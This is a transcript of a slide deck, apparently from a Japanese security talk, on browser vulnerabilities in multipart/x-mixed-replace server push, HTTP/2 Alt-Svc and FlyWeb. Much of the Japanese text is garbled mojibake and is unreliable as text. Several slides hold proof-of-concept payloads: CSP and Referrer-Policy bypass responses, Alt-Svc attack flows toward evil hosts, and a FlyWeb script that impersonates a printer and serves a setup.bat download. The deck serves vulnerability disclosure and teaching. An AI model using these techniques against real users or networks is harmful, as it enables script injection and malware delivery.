脆弱性発見者が注目する近年のWeb技術

Transcript

1. ੬ऑੑൃݟऀ͕஫໨͢Δۙ೥ͷ8FCٕज़ 3&$36*5
   5FDIOPMPHJFT
   /*()5
   WPM ೥݄೔

2. ੢ଜ फߊ גࣜձࣾϦΫϧʔτςΫϊϩδʔζ αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦ γχΞηΩϡϦςΟΤϯδχΞ ࠃ಺ܞଳి࿩ϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ ͳͲΛܦͯ೥݄ΑΓݱ৬ɻϦΫϧʔτͷ*%؅ཧج ൫ͷηΩϡϦςΟอक΍ϦΫϧʔτάϧʔϓશࣾͷ੬ऑ ੑमਖ਼ࢧԉʹܞΘΔɻझຯ͸ϒϥ΢βͷ੬ऑੑΛ୳͢͜ ͱɻ೥ʹใࠂͨ͠੬ऑੑ͸݅Λ௒͑Δɻஶॻʹ

   ϒϥ΢βϋοΫʢ؂༁ʣɻओͳߨԋྺʹ$0%& #-6& ɺ"750,:0 ɺ1BD4FD ɻ೥ΑΓ ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ

3. ੬ऑੑΛൃݟ͢Δਓͷࢹ఺Ͱ ஫໨͍ͯ͠Δ8FCٕज़Λ঺հ͠·͢

4. Server Push

5. • ௕೥ʹ౉Γٞ࿦ͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़ • աڈʹ͸4FSWFS
   4FOU
   &WFOUT΍8FC4PDLFU • *&5'Ͱ͸)551
   QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠ &BSMZ
   )JOUT͕ఏҊ͞Ε͍ͯΔ • ଞʹ΋ɺϒϥ΢βͰ1VTI௨஌Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ 8FC
   1VTIϓϩτίϧ΍1VTI
   "1*ͷ࢓༷ࡦఆ͕ߦͳΘΕ͍ͯΔ

   • ͦΜͳதɺݸਓతʹ஫໨͍ͯ͠Δͷ͸ʜ 4FSWFS
   1VTI

6. multipart / x-mixed-replace

7. http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html

8. • ೥ɺ/FUTDBQF
   ʹ౥ࡌ͞Εͨ࠷ݹͷ4FSWFS
   1VTI • .+1&(
   PWFS
   )551ͷ഑৴खஈͱͯ͠΋࢖༻͞Ε͍ͯΔ • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻཰͸ • ݱࡏͰ͸ɺ'JSFGPY͘Β͍͔͠·ͱ΋ʹαϙʔτ͍ͯ͠ͳ͍ • ҰମͲ͜Ͱ࢖ΘΕ͍ͯΔͷ͔

   NVMUJQBSUYNJYFESFQMBDF

9. #VH[JMMBͷݕࡧը໘ https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea

10. 3*$0)
    5)&5" https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html

11. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY

    Content-type: text/html <h1>Page 2</h1> --BOUNDARY- ϖʔδ໨ͷσʔλ ϖʔδ໨ͷσʔλ

12. Կނ஫໨͍ͯ͠Δ͔ͱ͍͏ͱ

13. ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ

14. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ

15. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

16. https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/

17. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ

18. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

19. ·ͩ௚ͬͯͳ͍ https://bugzilla.mozilla.org/show_bug.cgi?id=1296471

20. https://bugzilla.mozilla.org/show_bug.cgi?id=1296471 ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮૷͕ෆ׬શͰ͋Δ͜ͱΛ 8FCαΠτͷ։ൃऀ͕஌Δ͜ͱͷํ͕େ੾ͩͱ൑அ͠ɺ .P[JMMB͸ະमਖ਼ͷ੬ऑੑ৘ใΛ։ࣔ

21. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Referrer-Policy: no-referrer --BOUNDARY Content-type: text/html <a

    href="https://evil.example.jp">Link</a> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- 3FGFSSFS
    1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ ͳͷʹϦϑΝϥ͕ૹΒΕΔ

22. https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385 'JSFGPY
    Ͱઌिमਖ਼͞Εͨ

23. ৽͍͠ϔομ͕ొ৔͢Δͨͼָ͠ΊΔ

24. HTTP/2

25. • ೔࿨ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹ઀ଓͤ͞Δ͜ͱͷ Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱ঺հͨ͠ +YDL͞Μͱͷग़ձ͍͸ɺIUUQษڧձͰͨ͠ https://http2study.connpass.com/event/13251/

26. ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏

27. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification

28. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification ೔࿨ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ ཱ֬ͨ͠5-4ηογϣϯΛʜ )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠

29. • )551
    $POOFDUJPO
    3FVTF
    3'$
     - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Ε͹ɺ )551ίωΫγϣϯΛڞ༗ͯ͠Α͍ • )551
    "MUFSOBUJWF
    4FSWJDFT
    3'$
     -

    ಉ͡ϦιʔεΛఏڙ͢Δ୅ସαʔόͷ࢖༻ΛΫϥΠΞϯτʹఏҊ͢Δ - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ )551ͷίωΫγϣϯ؅ཧ͸ͳ͔ͳ͔େม alt-svc: h2="alt.example.jp:8000";

30. flickr.com ෳ਺υϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ Connection

31. flickr.com αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session Connection ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠๨Εͯ͠·͏ $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ

32. flickr.com ͦΕͬͯ੬ऑੑʁ flickr.com yahoo.com Certificate (valid for yahoo.com & flickr.com)

    Connection yahoo.com Establish TLS Session ྆ํͷαΠτͷݖརऀ͸ҰॹͳͷͰ GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘΋ ࣮࣭తͳڴҖ͸͋·Γͳ͍ͷͰ͸ʁ

33. ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱ͸ݶΒͳ͍ • ྫ͑͹ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏

34. ͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ

35. )551
    "MUFSOBUJWF
    4FSWJDF
    "MU4WD a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc:

    h2="b.example.jp:443" Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate

36. "MU4WDͷਖ਼͍࣮͠૷͸͜͏ͳΜͰ͕͢ʜ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ

37. ࣮૷ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ BFYBNQMFDPNͷ)551σʔλΛ ଞਓͷαʔόʹૹΓ෇͚Δ͜ͱ͕Ͱ͖Δ

38. ͜ͷ࣮૷ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ΋ evil XMLHttpRequest with DELETE method alt-svc: h2="victim:443" victim Preflight

    (OPTIONS method) DELETE request 1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ

39. https://bugzilla.mozilla.org/show_bug.cgi?id=1148357 ࢲ͸ڻ͍͍ͯΔɻ͜Ε͸"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ

40. ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙ΋ग़͖ͯͦ͏

41. FlyWeb

42. https://flyweb.github.io/#showcase

43. • .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱ෺ཧσόΠεͷ࿈ܞϓϩδΣΫτ - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ • ϓϩδΣΫτ͸·࣮ͩݧஈ֊ - 'JSFGPY
    /JHIUMZʹͷΈσϑΥϧτແޮͰ౥ࡌ - BCPVUDPOGJH

    Ͱ EPNGMZXFCFOBCMFEUSVF
    ʹઃఆ͢Δ͜ͱͰར༻Մೳ 'MZ8FC

44. • ෳ਺ͷεϚϗΛ઀ଓ͠ɺϒϥ΢β্ͰରઓܕϨʔεήʔϜΛ࣮ݱ 'MZ8FCͷར༻ྫʢ'MZ8FC
    (1ʣ https://www.youtube.com/watch?v=FJ5DEGvqDb4

45. 'MZ8FCͷ࢓૊Έ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞ಺ͷ୺຤͕ͦͷαʔόʹΞΫηε

46. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });

47. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ୺຤͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP
    'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢

48. αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ ϖʔδΛݟͨϢʔβ͕ʮ"MMPX
    4FSWFSʯΛબ୒͢Δͱ ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ

49. ϩʔΧϧΤϦΞʹ͋Δผͷ୺຤͕αʔόʹͭͳ͕Δ • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ

50. #POKPVSରԠΦϑΟεϓϦϯλͷ؅ཧը໘΋։͚Δ • 'JSFGPYͷ'MZ8FC΢Οϯυ΢͸@IUUQUDQʹ΋ରԠ͍ͯ͠ΔͷͰ #POKPVSͰ)551ͷ6*Λఏڙ͢Δػثʹ΋ΞΫηεͰ͖Δ

51. 'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ؅ཧը໘ʹͳΓ͢·͢ ؅ཧը໘ʹΞΫηεͨ͠୺຤ʹ Ϛϧ΢ΣΞ഑෍ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ

52. navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var

    h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠୺຤ʹ TFUVQCBU Λ഑෍

53. ͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ

54. (PPHMF຋༁ܦ༝Ͱ։͚͹ͦΕͬΆ͍υϝΠϯʹ

55. ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ ϓϦϯλυϥΠό͔ͳ͊ʜʁ

56. None

57. ͜ͷ··ͷ࢓༷ͩͱຊ౰ʹѱ༻͞Εͦ͏

58. • 4FSWFS
    1VTI
    NVMUJQBSUYNJYFESFQMBDF • )551 • 'MZ8FC ஫໨͍ͯ͠Δ8FCٕज़Λͭ঺հ͠·ͨ͠